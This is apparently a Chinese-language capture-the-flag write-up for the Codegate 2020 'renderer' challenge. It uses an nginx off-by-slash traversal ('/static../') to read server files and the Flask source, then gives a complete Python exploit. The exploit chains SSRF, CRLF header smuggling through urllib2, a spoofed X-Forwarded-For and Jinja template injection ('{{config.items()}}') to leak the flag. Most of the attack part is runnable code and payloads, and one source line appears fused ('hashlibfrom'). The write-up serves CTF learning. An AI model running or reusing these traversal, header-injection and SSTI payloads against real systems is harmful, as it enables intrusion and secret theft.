
codegate-2020 renderer


利用 nginx 配置不当造成的目录穿越（路径遍历）漏洞读取服务器上的文件。`/static../` 这种写法通常对应 `location /static`（末尾没有 `/`）搭配以 `/` 结尾的 `alias` 的典型 off-by-slash 配置错误：请求 `/static../x` 会被拼接成 static 目录上一级下的 `x`。结合后面 uwsgi.ini 里的 `chdir = /home/src` 可以推断 static 目录位于 `/home` 之下，因此应用源码、uwsgi 配置以及 `/home/tickets` 下的票据文件都能直接读取。
http://58.229.253.144/static../src/uwsgi.ini

[uwsgi]
# Working directory and WSGI entry point: the `app` object exported by
# /home/src/run.py. This confirms the source tree reachable through the
# nginx `static../` traversal is /home/src.
chdir = /home/src
module = run
callable = app
processes = 4
# Worker privileges. Ticket files written by routes.py under /home/tickets
# are therefore created as www-data.
uid = www-data
gid = www-data
# Unix socket the reverse proxy (nginx) forwards requests to.
socket = /tmp/renderer.sock
# 666 makes the socket world-writable: any local account can speak the uwsgi
# protocol to the app directly, bypassing nginx and whatever it filters.
# A 660 socket owned by a group shared with nginx is the usual fix.
chmod-socket = 666
vacuum = true
# Log and pidfile under predictable names in the world-writable /tmp.
daemonize = /tmp/uwsgi.log
die-on-term = true
pidfile = /tmp/renderer.pid

http://58.229.253.144/static../cleaner.sh

#!/bin/bash
# Hourly cleanup of the admin "tickets" that routes.py stores as
# /home/tickets/<sha1>. For the exploit this means a ticket written in
# step 1 has to be read back within the hour, or it is gone.
while :; do
    rm /home/tickets/*
    sleep 3600
done

结合 Flask 项目的常见目录结构（`app/__init__.py`、`app/routes.py`、`templates/` 等），继续用同一个穿越漏洞读取 `src` 目录下的源码。参考：
https://blog.csdn.net/weixin_44403501/article/details/88733895
http://58.229.253.144/static../src/app/__init__.py

from flask import Flask
from app import routes  # note this line: the routes module is what the writeup reads next
import os

app = Flask(__name__)
# Both /renderer/admin and /renderer/admin/ resolve to the same view.
app.url_map.strict_slashes = False
# All routes in routes.py are served under the /renderer prefix.
app.register_blueprint(routes.front, url_prefix="/renderer")
# The flag is kept in app.config. Anything that reaches Jinja's `config`
# object (e.g. render_template_string on attacker-controlled text) can
# read it back; that is what the exploit below leaks with {{config.items()}}.
app.config["FLAG"] = os.getenv("FLAG", "CODEGATE2020{}")

第二行 `from app import routes` 说明所有路由定义在 `app/routes.py` 中，继续读取该文件：
http://58.229.253.144/static../src/app/routes.py

from flask import Flask, render_template, render_template_string, request, redirect, abort, Blueprint
import urllib2
import time
import hashlibfrom os import path
from urlparse import urlparse

# Blueprint mounted at /renderer by app/__init__.py.
front = Blueprint("renderer", __name__)


@front.before_request
def test():
    # Debug hook: every request URL goes to stdout (the uwsgi log).
    print(request.url)


@front.route("/", methods=["GET", "POST"])
def index():
    """Render the form on GET; on POST fetch the submitted `url` server-side.

    The only validation is the scheme check inside proxy_read(), so this is
    an open SSRF primitive: it happily fetches http://127.0.0.1/..., which is
    how the loopback-only /admin routes below become reachable from outside.
    """
    if request.method == "GET":
        return render_template("index.html")
    url = request.form.get("url")  # fetch this URL on the client's behalf
    res = proxy_read(url) if url else False
    # An empty body (including proxy_read's "" for a rejected scheme) is a 400.
    if not res:
        abort(400)
    return render_template("index.html", data = res)


@front.route("/whatismyip", methods=["GET"])
def ipcheck():
    # Shows both values the admin routes compare, handy for testing spoofing.
    return render_template("ip.html", ip = get_ip(), real_ip = get_real_ip())


@front.route("/admin", methods=["GET"])
def admin_access():
    """Loopback-only admin page that records each visit as a ticket file.

    `ip` is the TCP peer address, `rip` is whatever X-Forwarded-For says.
    Via the SSRF in index() the peer is the server itself (127.0.0.1), so the
    first check passes, and the header value is attacker-chosen.
    """
    ip = get_ip()
    rip = get_real_ip()
    if ip not in ["127.0.0.1", "127.0.0.2"]: #super private ip :)
        abort(403)
    if ip != rip: #if use proxy
        # Writes the raw X-Forwarded-For value into a ticket file. With a
        # spoofed header this stores attacker text that admin_ticket() later
        # feeds to render_template_string().
        ticket = write_log(rip)
        return render_template("admin_remote.html", ticket = ticket)
    else:
        if ip == "127.0.0.2" and request.args.get("body"):
            # Arbitrary request-controlled content becomes a ticket file.
            ticket = write_extend_log(rip, request.args.get("body"))
            return render_template("admin_local.html", ticket = ticket)
        else:
            return render_template("admin_local.html", ticket = None)


@front.route("/admin/ticket", methods=["GET"])
def admin_ticket():
    """Render a stored ticket. The three gates are all client-satisfiable:
    X-Forwarded-For can simply be set equal to the peer address (or omitted,
    since get_real_ip() falls back to it), the peer address is loopback when
    the request arrives through the SSRF, and the User-Agent is a fixed
    string. The ticket body then goes through render_template_string(), i.e.
    it is evaluated as a Jinja template -> SSTI, which exposes app.config.
    """
    ip = get_ip()
    rip = get_real_ip()
    if ip != rip: #proxy doesn't allow to show ticket
        print 1
        abort(403)
    if ip not in ["127.0.0.1", "127.0.0.2"]: #only local
        print 2
        abort(403)
    if request.headers.get("User-Agent") != "AdminBrowser/1.337":
        print request.headers.get("User-Agent")
        abort(403)
    if request.args.get("ticket"):
        log = read_log(request.args.get("ticket"))
        if not log:
            print 4
            abort(403)
        # Sink: file content that originated from a request header or query
        # argument is rendered as a template, not as data.
        return render_template_string(log)
    # NOTE(review): no return for a request without ?ticket= -> Flask 500.


def get_ip():
    # TCP peer as seen by the WSGI layer.
    return request.remote_addr


def get_real_ip():
    # Taken verbatim from the request; nothing checks that the header was set
    # by a trusted proxy, so this value is client-controlled.
    return request.headers.get("X-Forwarded-For") or get_ip()


def proxy_read(url):
    """Fetch `url` server-side and return the body ("" for a non-http(s) scheme).

    No host allow-list, no timeout, no size limit, and urllib2 follows
    redirects by default. The exploit on this page additionally relies on an
    older Python 2 urllib2 not rejecting CR/LF in the request target (the
    CRLF-injection bug later fixed upstream), which lets the caller append
    extra header lines to the loopback request.
    """
    #TODO : implement logging
    s = urlparse(url).scheme
    if s not in ["http", "https"]:
        return ""
    return urllib2.urlopen(url).read()


def write_log(rip):
    """Store "Admin page accessed from <rip>" under /home/tickets/<id>.

    The id is sha1(time + rip), so it is guessable given the timestamp, but it
    is also handed back to the caller through the template anyway.
    """
    tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
    with open("/home/tickets/%s" % tid, "w") as f:
        log_str = "Admin page accessed from %s" % rip
        f.write(log_str)
    return tid


def write_extend_log(rip, body):
    """Same as write_log() but stores the caller-supplied `body` as-is."""
    tid = hashlib.sha1(str(time.time()) + rip).hexdigest()
    with open("/home/tickets/%s" % tid, "w") as f:
        f.write(body)
    return tid


def read_log(ticket):
    """Return the ticket file's content, or False if missing/invalid.

    isalnum() blocks path traversal here (no "/" or "." can pass), while the
    sha1 hexdigest ids produced above pass it.
    """
    if not (ticket and ticket.isalnum()):
        return False
    if path.exists("/home/tickets/%s" % ticket):
        with open("/home/tickets/%s" % ticket, "r") as f:
            return f.read()
    else:
        return False
import requests
from urllib import parse
import re,os,sys
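# Exploit chain against the renderer target (see routes.py above):
#   1. SSRF: POST /renderer {url=...} makes the server fetch http://127.0.0.1/...
#   2. CRLF injection in the fetched path adds headers (X-Forwarded-For,
#      User-Agent) to that loopback request.
#   3. /renderer/admin stores the spoofed X-Forwarded-For in a ticket file and
#      /renderer/admin/ticket renders that file with render_template_string,
#      so a {{...}} expression in the header is evaluated (SSTI) and
#      app.config["FLAG"] is printed.
# NOTE: this host differs from the 58.229.253.144 instance used for the recon
# URLs above; point it at whichever instance is live.
TARGET = 'http://110.10.147.169/renderer'
LOOPBACK = "http://127.0.0.1"            # what the server fetches on our behalf
TICKET_RE = re.compile(r"[a-f0-9]{40}")  # ticket ids are sha1 hexdigests


def smuggle(path, headers=()):
    """Build the `url` value that injects `headers` into the server-side request.

    Python 2 urllib2 copies the URL path into the request line unescaped, so
    ``path + " HTTP/1.1" + CRLF`` ends the request line early and every entry
    of `headers` becomes its own header line. An empty entry yields a blank
    line, i.e. it terminates the header block so that whatever urllib2 appends
    afterwards (its own Host/User-Agent) lands in the body instead.

    Args:
        path: absolute URL on the loopback host, e.g. "http://127.0.0.1/x".
        headers: header lines without their trailing CRLF.
    Returns:
        The string to submit as the `url` form field.
    """
    return path + " HTTP/1.1\r\n" + "".join(h + "\r\n" for h in headers)


def extract_ticket(text):
    """Return the first 40-hex-char ticket id found in `text`, or None."""
    m = TICKET_RE.search(text)
    return m.group(0) if m else None


def fetch_via_target(payload, target=TARGET):
    """Submit `payload` to the renderer form and return the response body."""
    r = requests.post(url=target, data={'url': payload})
    return r.text


def write_ticket(target=TARGET):
    """Step 1: make the server store ``{{config.items()}}`` in a ticket file.

    The SSRF'd request reaches /admin with remote_addr 127.0.0.1 while
    X-Forwarded-For is spoofed, so the `ip != rip` branch runs write_log(),
    which saves "Admin page accessed from <X-Forwarded-For>" verbatim. The
    ticket id is echoed in the admin_remote.html response and scraped here.

    Returns:
        The ticket id, or None when no id was found in the response.
    """
    payload = smuggle(
        LOOPBACK + "/renderer/admin?a=1",
        [
            "X-Forwarded-For: 127.0.0.2{{config.items()}}",
            # Throwaway header; presumably absorbs the " HTTP/1.1" urllib2
            # appends after our path as a folded continuation line.
            "Header2: x",
        ],
    )
    ticket_number = extract_ticket(fetch_via_target(payload, target))
    if ticket_number:
        print(ticket_number)
    return ticket_number


def check(ticket, target=TARGET):
    """Step 2 (optional): read the ticket file back through the nginx
    ``static../`` traversal to confirm the template expression was stored."""
    payload = smuggle(LOOPBACK + "/static../tickets/" + ticket, ["Header2: x"])
    print(fetch_via_target(payload, target))


def read_flag(ticket, target=TARGET):
    """Step 3: have /admin/ticket render the ticket, which triggers the SSTI.

    The route demands remote_addr == X-Forwarded-For (both 127.0.0.1 here)
    and User-Agent "AdminBrowser/1.337". The blank line after
    X-Forwarded-For closes the header block so urllib2's own User-Agent,
    appended later, cannot override ours; ``Host: *`` presumably stands in
    for the Host header that the same trick pushes into the body.
    """
    payload = smuggle(
        LOOPBACK + "/renderer/admin/ticket?ticket=" + ticket,
        [
            "User-Agent: AdminBrowser/1.337",
            "Host: *",
            "X-Forwarded-For: 127.0.0.1",
            "",  # blank line: end of headers
            "Header2: x",
        ],
    )
    print(payload)
    print(fetch_via_target(payload, target))


if __name__ == '__main__':
    # Step 1: write the template expression into a ticket via write_log()
    # (the ip != rip branch; write_extend_log() is not the path taken here).
    ticket = write_ticket()
    if ticket is None:
        raise SystemExit("no ticket id in the response; the SSRF/header injection did not work")
    # Step 2: confirm it was really stored.
    check(ticket)
    # Step 3: render it and read the flag.
    read_flag(ticket)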